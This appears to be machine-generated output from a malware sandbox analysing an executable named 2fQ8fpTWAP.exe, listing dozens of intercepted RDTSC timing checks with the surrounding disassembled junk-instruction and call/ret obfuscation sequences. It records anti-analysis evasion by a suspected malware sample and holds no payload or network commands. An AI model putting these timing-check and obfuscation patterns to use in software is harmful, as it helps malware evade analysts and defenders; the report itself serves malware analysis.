Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4C42 second address: 7B4C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4C4F second address: 7B4C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4C53 second address: 7B4C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4DE0 second address: 7B4DF6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7A2D39F16Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4DF6 second address: 7B4DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4DFA second address: 7B4E29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F7A2D39F16Bh 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jmp 00007F7A2D39F171h 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7B4E29 second address: 7B4E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7A2CC6ACE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7A631A second address: 7A6331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A2D39F16Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7A6331 second address: 7A6335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D4611 second address: 7D4632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D4632 second address: 7D463B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D463B second address: 7D4641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D4641 second address: 7D4645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D4A3E second address: 7D4A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D4A44 second address: 7D4A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D4D8A second address: 7D4DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F7A2D39F179h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D4DB1 second address: 7D4DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7A2CC6ACF0h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F7A2CC6ACF6h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F7A2CC6ACEDh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D51AD second address: 7D51BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F7A2D39F166h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D51BA second address: 7D51BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D51BE second address: 7D5202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7A2D39F17Ch 0x0000000c jmp 00007F7A2D39F174h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 jmp 00007F7A2D39F174h 0x00000019 jmp 00007F7A2D39F16Bh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D5536 second address: 7D554C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7A2CC6ACE6h 0x0000000a jmp 00007F7A2CC6ACECh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79A43C second address: 79A440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79A440 second address: 79A444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79A444 second address: 79A450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 79A450 second address: 79A454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D5EAD second address: 7D5EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D61D4 second address: 7D61F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F7A2CC6ACF5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D61F0 second address: 7D6209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F7A2D39F16Dh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D6640 second address: 7D666B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F7A2CC6ACEAh 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F7A2CC6ACE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D7ECE second address: 7D7EE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D8CEC second address: 7D8D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7A2CC6ACF3h 0x00000008 jne 00007F7A2CC6ACE6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007F7A2CC6ACF2h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7DA7BC second address: 7DA7C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7DA7C0 second address: 7DA7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a jnl 00007F7A2CC6ACE6h 0x00000010 pop edi 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7A2CC6ACF7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7DA7F1 second address: 7DA7F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7DA7F7 second address: 7DA817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F7A2CC6ACE6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7A2CC6ACEEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7DEE7A second address: 7DEE90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7A2D39F170h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E191A second address: 7E192A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7A2CC6ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E192A second address: 7E193E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F170h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E193E second address: 7E1962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push edi 0x00000008 push ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7A2CC6ACF4h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E1C04 second address: 7E1C31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F7A2D39F17Dh 0x0000000c jmp 00007F7A2D39F175h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push edx 0x00000015 js 00007F7A2D39F16Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7D8CE8 second address: 7D8CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E2370 second address: 7E2376 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E2376 second address: 7E2387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jnp 00007F7A2CC6ACE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E44E4 second address: 7E44EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E44EA second address: 7E44F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E46C4 second address: 7E46CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E47CE second address: 7E47D8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7A2CC6ACECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E47D8 second address: 7E47E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E4BA5 second address: 7E4BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E4C44 second address: 7E4C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E4FD2 second address: 7E4FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E4FDF second address: 7E4FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E4FE3 second address: 7E4FED instructions: 0x00000000 rdtsc 0x00000002 js 00007F7A2CC6ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E50CE second address: 7E50D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E730C second address: 7E731B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7A2CC6ACE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E7E4A second address: 7E7E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E8988 second address: 7E8993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7A2CC6ACE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E8993 second address: 7E8998 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7E9365 second address: 7E9369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EA0D2 second address: 7EA0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F170h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EA0E6 second address: 7EA0EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EAB5B second address: 7EAB65 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7A2D39F166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F002D second address: 7F0097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7A2CC6ACEEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e sub di, DF90h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F7A2CC6ACE8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f add edi, dword ptr [ebp+122D1B48h] 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D1FABh], ebx 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f jmp 00007F7A2CC6ACF7h 0x00000044 push eax 0x00000045 push edx 0x00000046 push ebx 0x00000047 pop ebx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F0097 second address: 7F009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EE3FA second address: 7EE437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7A2CC6ACF0h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7A2CC6ACF3h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F009B second address: 7F00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7EE437 second address: 7EE43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F00AA second address: 7F00AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F00AF second address: 7F00B9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7A2CC6ACECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F2007 second address: 7F200C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F200C second address: 7F2078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F7A2CC6ACE8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D38EBh], esi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F7A2CC6ACE8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D38B8h], ecx 0x00000050 push eax 0x00000051 jl 00007F7A2CC6ACF4h 0x00000057 push eax 0x00000058 push edx 0x00000059 push esi 0x0000005a pop esi 0x0000005b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F225D second address: 7F2264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F30EC second address: 7F30F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F3F18 second address: 7F3F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F3F36 second address: 7F3F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F3F3A second address: 7F3F44 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7A2D39F166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F3F44 second address: 7F3F97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F7A2CC6ACE8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov di, 5792h 0x0000002c push 00000000h 0x0000002e mov edi, edx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F3F97 second address: 7F3FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F4F68 second address: 7F4FC6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7A2CC6ACF0h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c or dword ptr [ebp+12483D01h], ebx 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D3BDBh] 0x0000001a jp 00007F7A2CC6ACEBh 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 clc 0x00000024 popad 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F7A2CC6ACE8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov dword ptr [ebp+122D18B0h], ecx 0x00000047 mov di, 64C3h 0x0000004b xchg eax, esi 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F4FC6 second address: 7F4FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 7F5EBB second address: 7F5F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F7A2CC6ACE8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D217Ah], eax 0x0000002d push 00000000h 0x0000002f xor bl, 00000000h 0x00000032 push 00000000h 0x00000034 add dword ptr [ebp+122D196Eh], edx 0x0000003a jmp 00007F7A2CC6ACECh 0x0000003f push eax 0x00000040 je 00007F7A2CC6AD09h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F7A2CC6ACF2h 0x0000004d rdtsc
